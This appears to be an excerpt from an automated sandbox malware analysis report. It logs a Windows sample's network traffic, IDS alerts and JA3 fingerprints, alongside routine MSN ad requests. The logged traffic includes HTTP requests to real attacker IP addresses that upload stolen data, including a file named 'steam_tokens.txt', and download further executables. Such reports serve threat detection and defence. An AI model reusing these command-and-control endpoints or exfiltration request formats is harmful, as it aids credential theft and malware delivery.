48 49 44 41 41 45 43 2d 2d 0d 0a Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="file"------HJJKFBGCFHCGDHIDAAEC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIEBGHDAEBGDGCFIIDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 2d 2d 0d 0a Data Ascii: ------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="message"ybncbhylepme------HDGIEBGHDAEBGDGCFIID--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJEHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JJDGCGHCGHCBFHJJKKJE--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49724 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49835 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49875 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50031 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50045 -> 104.21.16.9:443

Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.84
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.11

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_6CA7CC60 PR_Recv,

1_2_6CA7CC60

Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123108Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=0afb632b21b94c288a903632d99057e3&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-338388&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AATPQo87ck+qXC65ASioF4itdaoFBmguJLs3nowrdU0XR2+3aIBbIJUsx3SLMj+VyAKzTx3F/pkz9tNs8Dyop49/1Dp+OALjjmXu0uluM3D3Okpe6hFHh5h//6GZ0A7S3h+MpIS8Mc/vBgdEcEnG007uE3vPLEJnLBv3sudbN1mc3XSaC7nyBMMqYdE3lubBowFBcxStiVabKZtt1IWgxYkl6DhevJ7BboGkxHG0rUtiRXM1IWOOFXjOUAF+GvdGRDqGCXXo3nBQKm6QNiLbX/BSNfYCiiuy78aE/jStrkKWWGdeLcG6O/YC27LvxfNAXzTDrafNzQSLGORblDHzidCsQZgAAEIawaWouonXpJ55XwhnY0HewAeIPNsrVUvYO+hic8VQeMvNDfGPygu96ygPJ/ejKHvzARalYFDGkwIIHxgNUpPVIBsyrENVi//1gkJz/vDXUoU3zAS/ravep8PAMQW02PRTwslizNGknQyQW6Zb1GOp5kGL7wUd1N1zIzUrBsd/Toxix5VhySAkncrpN2FX2ZZwQhUMJ1NpXtlToiDJL2zrHqgvoppWQlUOVdZJwD2SGv8tBmY2VajVgz9CSV/U/0kSCjk9rOTxJmBUwi/NMadempcjmMY6a6V4ixgM15DPzpnxlaEQHrxUnA8kVO7gZYa9s1ujFYQ2jfNauo3+5vqIRWs2V9CObOHQEpvq+NEc8FfUr9R13iiOv+GAcW6+am8/C06GT4qQ0ax2Np3TCF1COjB43JubV2wrHeWAEltDNls2nJ2Zu8QBRCUHtpJJKdnyGjV3TypEH+c0lPsJNY7NiLBrjd0FArhnfewmY+xUXzl9qNfE/iDuocZj2K/G2sMpnJGgr9g+WDrXY4x0v5vmrT3R5oT6bBODnH3EL4VIF5ZkjStjWILNyRe8A5oQtEXoLR2EC9KER9YRiPjbENiaRJdgB&p=Cache-Control: no-cacheMS-CV: BIV/rQ3HEUi8aNLi.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123108Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=68f618433d7343ee91702ec990d8faa1&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-338387&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AASp0AqrsC9r/xwFl+z2y2UsBJJfgRDz+895SPUhgR6pcAWcIIP2oJrW+1j3pNyTqKgRupi9+l1kJ+SvaCNMGWfE3cO1gKXxNKCEWczPo11P7s99D0mu8SGlDRLLPM9Mx0hF41kYjjomrPdDZomjT9UrkuKHyTa2lMdMuGh8DCwVmwaOHHA3EEUvZ0kds4UxJFdn7A28+lzZrl4opVyHpcs6tRluUJlzTmpHAcryi7aGuNd2Lg1eVpOSOGqEeqRw0Rx7XgSH5lttOsQd4lOIs4P1GKZE/GpqSa+tC+5pa1uv0S9Au/bTolRfZjx08hfs8hLfG289zNOES14CScPq2tMgQZgAAEELAwAzTUGUV43IS9cSUt6CwAZ5xTWQmNtlbI5yvrvYJoeDM6i2cwWhkErkXIaLcjq73TIdKjP2imZldo5PjlIxcH7jnWIrBQHB5N6oqBC/AOvAr3B9EckkAGJVnp1U8XuiOsWHmc1Svv3Vlc2+nwnIMfGB8YvtWGXBRm9soCCLXYtGi1QiDpUb6hSuyecduMUfRe3wgWg8RRTaVo9VJ4O2P0SfBiFMI3H8GL+E2SlbVob12epGXjSdveoFPe1EuNabu7NSH/abk/F1XuxAqWqreCrITO1J8F9JyOvi+5dWRtV8XTvAVcCpk/jDsuQy9IjipdZVEXDXgPxwO+TTcNSy5u/mXS/p4R7jtRGA955fu6tfG/o0Ijltx+mmBuT9iaS9kvikqQl8kYh4RIOyu7xDPAX9Rh9nGtOYwbmP4P+KXUI2aglfUThAiyek9mKSls8yNMzbH9frwIClkcwY0P4DRwz0igqszKMwQh8cTjiz5t9qMW2xf6+1Ypf30Y8nWKRSpviHkAzCcPn9jvLMCB2PdZeGEx0Dvh0u4iPjedZl7YVkLln+0417uqBSxq/zPGV+aTWsEPBKVvFTRNGVasjBYhtgB&p=Cache-Control: no-cacheMS-CV: BIV/rQ3HEUi8aNLi.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123108Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=274a5ff7be2541a3a38cb45b9f69a84d&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-280815&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAfs5GOX61lVM8UnUOWdIeg/DUKLjZdbZ80HPE+KG0CZg1HHuvFd/HVDp4/sYdYYGDv0Dfq9A2zc5btmMURBMu0e/948OQ3yFE6rvyf+nT5sTGTGA0qpPnPKlgAnX8SHKgwxUD5fjLnELL4hCV9O03UVxeLA16Darc/N64dlJereDvVoSr3zrS5ui1o97pjJ3soR6U4/kvFX2zVqANP1MKyXciMzNUd9wFKN57fw4/tfq6JULpep0i/+orwdesl7HrLwIQmw4XBm6X9Q2hDsNDAU+xZqwgCissp40y+nJfJHmEzcOeTSI1sfavR1kX+nuk6oGhwp9HCs9l3WzMoaI5SIQZgAAEOLsCLdV6rZjmXnijNY8jKOwAdE7DCijWuf/WBoztPmdquMFBiDxXB1uA9fNDylpqpb9xUnEluECm3UW8jo0OwWKNGUQUHteZoVw0cj47il+h0pg7ALIrmbuQiGZb7UR2ECsHcjN7Ck44Ce12quBBnewyzNU8+GkNx9+3GIcs3XcrVDSTS9yaK5cGTEFUQCBHT5kLgZaGrXt6GVnlC4MTzyRyddShvWqiWpFKUzbsOJLBL3rJQlf6Ycr+n8Ga0nFypPwsvxQdjwx0Y93FfwBCGNDZxSDomrzsdMG1o2aIEVNqrE2aJQDgJnDt1ATq1UgrcrLICyNUlHIeWRDDwLCz5665unqoR2NXvb+uT07UZVCePKDyVFvuazus01S/4C5Jia+YKk+eukkRaIevorFUlNIo7T0dG5kKL5WcXk4/uAf5P6o/KQgkhlUj8y15kjDOvz6dT1n0bkolb8Gvzv6z4TMhSX95JfmRgKK2wkWFrIXl2/G/nN+CTYkmODrVgFh2Fcs3jxMrsQJV1H6daDFnSl6LAA5IVylKiovi+fd7uSgxu/Riml2Xr/+YvcqOPVg0H535w8i25leBTFPm3CBnet8N9gB&p=Cache-Control: no-cacheMS-CV: BIV/rQ3HEUi8aNLi.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123113Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9aa11aaba26140b9a54dc9f3611abfef&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-338388&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=99999999&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AASp0AqrsC9r/xwFl+z2y2UsBJJfgRDz+895SPUhgR6pcAWcIIP2oJrW+1j3pNyTqKgRupi9+l1kJ+SvaCNMGWfE3cO1gKXxNKCEWczPo11P7s99D0mu8SGlDRLLPM9Mx0hF41kYjjomrPdDZomjT9UrkuKHyTa2lMdMuGh8DCwVmwaOHHA3EEUvZ0kds4UxJFdn7A28+lzZrl4opVyHpcs6tRluUJlzTmpHAcryi7aGuNd2Lg1eVpOSOGqEeqRw0Rx7XgSH5lttOsQd4lOIs4P1GKZE/GpqSa+tC+5pa1uv0S9Au/bTolRfZjx08hfs8hLfG289zNOES14CScPq2tMgQZgAAEELAwAzTUGUV43IS9cSUt6CwAZ5xTWQmNtlbI5yvrvYJoeDM6i2cwWhkErkXIaLcjq73TIdKjP2imZldo5PjlIxcH7jnWIrBQHB5N6oqBC/AOvAr3B9EckkAGJVnp1U8XuiOsWHmc1Svv3Vlc2+nwnIMfGB8YvtWGXBRm9soCCLXYtGi1QiDpUb6hSuyecduMUfRe3wgWg8RRTaVo9VJ4O2P0SfBiFMI3H8GL+E2SlbVob12epGXjSdveoFPe1EuNabu7NSH/abk/F1XuxAqWqreCrITO1J8F9JyOvi+5dWRtV8XTvAVcCpk/jDsuQy9IjipdZVEXDXgPxwO+TTcNSy5u/mXS/p4R7jtRGA955fu6tfG/o0Ijltx+mmBuT9iaS9kvikqQl8kYh4RIOyu7xDPAX9Rh9nGtOYwbmP4P+KXUI2aglfUThAiyek9mKSls8yNMzbH9frwIClkcwY0P4DRwz0igqszKMwQh8cTjiz5t9qMW2xf6+1Ypf30Y8nWKRSpviHkAzCcPn9jvLMCB2PdZeGEx0Dvh0u4iPjedZl7YVkLln+0417uqBSxq/zPGV+aTWsEPBKVvFTRNGVasjBYhtgB&p=Cache-Control: no-cacheMS-CV: BIV/rQ3HEUi8aNLi.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123114Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=8a7cfe7c99e7412b82dc03b702c89e2c&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-280815&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AASp0AqrsC9r/xwFl+z2y2UsBJJfgRDz+895SPUhgR6pcAWcIIP2oJrW+1j3pNyTqKgRupi9+l1kJ+SvaCNMGWfE3cO1gKXxNKCEWczPo11P7s99D0mu8SGlDRLLPM9Mx0hF41kYjjomrPdDZomjT9UrkuKHyTa2lMdMuGh8DCwVmwaOHHA3EEUvZ0kds4UxJFdn7A28+lzZrl4opVyHpcs6tRluUJlzTmpHAcryi7aGuNd2Lg1eVpOSOGqEeqRw0Rx7XgSH5lttOsQd4lOIs4P1GKZE/GpqSa+tC+5pa1uv0S9Au/bTolRfZjx08hfs8hLfG289zNOES14CScPq2tMgQZgAAEELAwAzTUGUV43IS9cSUt6CwAZ5xTWQmNtlbI5yvrvYJoeDM6i2cwWhkErkXIaLcjq73TIdKjP2imZldo5PjlIxcH7jnWIrBQHB5N6oqBC/AOvAr3B9EckkAGJVnp1U8XuiOsWHmc1Svv3Vlc2+nwnIMfGB8YvtWGXBRm9soCCLXYtGi1QiDpUb6hSuyecduMUfRe3wgWg8RRTaVo9VJ4O2P0SfBiFMI3H8GL+E2SlbVob12epGXjSdveoFPe1EuNabu7NSH/abk/F1XuxAqWqreCrITO1J8F9JyOvi+5dWRtV8XTvAVcCpk/jDsuQy9IjipdZVEXDXgPxwO